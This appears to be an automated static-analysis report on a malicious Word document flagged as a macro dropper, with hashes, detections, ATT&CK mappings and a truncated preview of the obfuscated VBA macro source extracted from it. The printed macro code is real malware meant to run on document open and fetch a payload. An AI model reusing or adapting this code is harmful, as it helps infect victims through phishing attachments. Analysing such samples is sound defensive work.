Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a10726236520a31f…

MALICIOUS

Office (OLE)

191.0 KB Created: 2018-05-14 22:08:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: 3ec740552c4bfc852c28d81abbd92394 SHA-1: 0981f255c855ba122dcb1be0602c5381b9d76bb2 SHA-256: a10726236520a31f9dcb149f3d49a309406a860d2724492c000d4dd23ddfb3ac
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV and contains VBA macros, specifically a Document_Open macro that executes code. The VBA code appears to be obfuscated, but its structure suggests it is intended to download and execute a secondary payload. The presence of a Document_Open macro and the overall detection as a dropper indicates a likely initial access vector via spearphishing attachment.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6545192-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6545192-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11976 bytes
SHA-256: 34ecf067c2de2279e3274fdb356db90f71446bb055fc685788c54e6227c59f62
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hipless(conductivity)
Dim avons As Integer
Dim cullis As Long
Dim blower As Byte
Dim hospitality As Byte
#If (19 - 118 + 499 + 84 - 94 + 310) > ((95 - 72 + 297) - (14 - 117 + 643) * 1) And ((2 - 90 + 116) - (90 - 123 + 61)) * 2 < (Win64) Then
Dim cellar As Long
Dim canonicate As LongPtr
caravel = 115 - 74 - 33
Dim nominis As LongPtr
Dim efface As Long
Dim melancholic As String
Dim monotremata As LongPtr
Dim galley As String
lifeline = VarPtr(canonicate)
phonogram = vincible(lifeline, VarPtr(conductivity) + (102 - 120 + 26), caravel)
#ElseIf (108 - 128 + 420 + 98 - 14 + 216) > ((111 - 37 + 246) - (6 - 92 + 626) * 1) And Not ((94 - 16 - 50) - (113 - 105 + 20)) * 2 < (Win64) Then
Dim canonicate As Long
caravel = 25 - 50 + 29
Dim nominis As Long
Dim monotremata As Long
lifeline = VarPtr(canonicate)
phonogram = entium(lifeline, VarPtr(conductivity) + (71 - 42 - 21), caravel)
#End If
artist = 93 - 110 + 16
nominis = 4 - 28 + 24
apochromatic = 95 - 79 - 16
monotremata = 89 - 58 + 9841
unsoldierlike = 22 - 127 + 4201
fastidouus = 20 - 117 + 161
exorable = virgilia(ByVal artist, _
nominis, ByVal apochromatic, monotremata, ByVal unsoldierlike, _
ByVal fastidouus)
angiopteris = angiopteris + 307
achondroplasia = Rnd(490)
#If (37 - 110 + 473 + 121 - 74 + 253) > ((78 - 85 + 327) - (12 - 18 + 546) * 1) And ((98 - 112 + 42) - (5 - 86 + 109)) * 2 < (Win64) Then
goodday = vincible(nominis, canonicate, 11 - 39 + 5911)
#ElseIf (60 - 8 + 348 + 3 - 119 + 416) > ((118 - 43 + 245) - (30 - 115 + 625) * 1) And Not ((44 - 10 - 6) - (44 - 98 + 82)) * 2 < (Win64) Then
auklet = entium(nominis, canonicate, 12 - 26 + 5897)
#End If
scoffing = 28 + 41
Pmt 0, scoffing, 35230, 10181, 8
hipless = nominis
End Function
Function vincible(droughter, gallope, fertilizable)
Dim army As Long
Dim cannabidaceae As String
Dim guards As LongPtr
Dim gurgle As LongPtr
Dim asio As LongPtr
Dim constat As Variant
Dim consultation As LongPtr
Dim autumal As LongPtr
mcintosh = szechwan
szechwan = "ambassador"
gurgle = droughter
autumal = fertilizable
miocene = Fix(257)
consultation = gallope
labrador = 27 + 19
Pmt 0, labrador, 14434, 14037, 7
accretive = mcintosh
guards = 56 - 29 - 28
balsaminaceae ByVal guards, _
gurgle, _
consultation, autumal, _
asio
mcintosh = "contemptible"
End Function
Sub chrysolite()
Dim psycholinguistics As Integer
Dim outmarch As String
inebriety.coastline.Value = Day(#12/5/2013#)
varday = notary = deus
discolor = "ahead"
breakers = "duarchy"
braced = "enormous"
brattle = demonolatry
gallinule = "poetess"
creditworthiness = "sparse"
Set pomoxis = inebriety.coastline.SelectedItem
bacchanalian = 8 + 12
Pmt 0, bacchanalian, 3908, 12659, 5
counterbombardment = pomoxis.Name
nervos = 74 - 13 + 7783
hypocrite = Right(counterbombardment, nervos)
centrifuge = radiochemistry(hypocrite)
apophasis = 47 + 20
Pmt 0, apophasis, 35729, 32824, 8
semiliquid = "acrostichum"
#If (71 - 40 + 369 + 27 - 32 + 305) > ((80 - 102 + 342) - (18 - 24 + 546) * 1) And ((41 - 119 + 106) - (32 - 85 + 81)) * 2 < (Win64) Then
Dim apes As String
Dim colored As LongPtr
Dim acned As LongPtr
Dim ceramics As Long
#ElseIf (25 - 43 + 418 + 73 - 39 + 266) > ((73 - 73 + 320) - (87 - 51 + 504) * 1) And Not ((87 - 58 - 1) - (57 - 60 + 31)) * 2 < (Win64) Then
Dim myxomycota As String
Dim acned As Long
Dim aragon As String
Dim colored As Long
#End If
deinonychus = 102 - 61 - 41
cestoda = "bubble"
abidjan = "homona"
capricornis = 51 - 4 + 4049
altar = 20 + 29
Pmt 0, altar, 3876, 35786, 3
climactic = arioso
tibetoburman = heckle
mecate = "senators"
greens = 51 + 35
Pmt 0, greens, 15889, 55929, 3
hearts = centrifuge
drow = batching
affair = "inconsiderable"
colored = hipless(hearts)
charybdis = "a
... (truncated)